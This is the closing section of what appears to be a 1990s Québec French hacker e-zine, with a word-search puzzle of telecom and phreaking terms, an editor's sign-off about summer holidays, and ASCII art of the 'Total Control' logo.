TADAM... le super Total-control-MOts-Crois‚s.
Have phun.

Banque de mots:
===============

Millennium	quebectel	phreaking
nortel		hacking		bell
payphone	telecom		unitel
plq		internet	linux
norstar		reseau		pla
phrack		npc		telebec

+---+---+---+---+---+---+---+---+---+---+
| P | A | T | L | C | P | T | O | M | T |
+---+---+---+---+---+---+---+---+---+---+
| H | L | E | E | P | A | A | L | I | U |
+---+---+---+---+---+---+---+---+---+---+
| R | P | L | T | N | Y | T | C | L | N |
+---+---+---+---+---+---+---+---+---+---+
| E | N | E | C | M | P | E | R | L | I |
+---+---+---+---+---+---+---+---+---+---+
| A | O | B | E | O | H | N | E | E | T |
+---+---+---+---+---+---+---+---+---+---+
| K | R | E | B | C | O | R | S | N | E |
+---+---+---+---+---+---+---+---+---+---+
| I | S | C | E | E | N | E | E | N | L |
+---+---+---+---+---+---+---+---+---+---+
| N | T | P | U | L | E | T | A | I | O |
+---+---+---+---+---+---+---+---+---+---+
| G | A | L | Q | E | N | N | U | U | T |
+---+---+---+---+---+---+---+---+---+---+
| R | R | Q | O | T | L | I | R | M | U |
+---+---+---+---+---+---+---+---+---+---+
| L | E | H | A | C | K | I | N | G | S |
+---+---+---+---+---+---+---+---+---+---+

-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                               0=------------=0
                               |  Conslusion  |
                               0=------------=0
                      Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

        Yep, un autre num‚ro de fini... moi je pars en vacance sur le pouce
avec Calimes... on va au Vans Warped Tour … Montreal pis faire un tour aux USA
pour finalement se ramasser au GT de #warezquebec.

        Je pars du 20 juillet au 1 ao–t alors ne paniquez pas si vos e-mail ne
sont pas replyer tout de suite.

        Je pars, j'oublie tout... mˆme mon ordi. (ouf ca va etre dur) :-)

Je vous reparlerai de la Saga Corruption Addicts si y'a des d‚veloppements.

Apportez de l'eau au moulin : err418@technologist.com


          000000000000000000000000
          000000000000000000000000
          00000000000000000000000
                   0000000
                   0000000
                   0000000
                   0000000
                   0000000
                   0000000
                   0000000
                   0000000                              
                   0000000                  0000000000000000000
                   0000000                000000000000000000000
                   0000000               00000000000000000000
                   0000000              00000
                   0000000             00000
                   0000000            00000
                                      00000
                                      00000
                T                     00000
                 O                    00000
                  T                   00000
                   A                   00000
                    L                  000000
                                        000000
                     Control             000000
                                          00000000000000000000000
                         Industries        0000000000000000000000
                                             00000000000000000000


(-=-=-=-=-=-=-=-=-=-=-=-=-=-=Fin de la transmission=-=-=-=-=-=-=-=-=-=-=-=-=-)
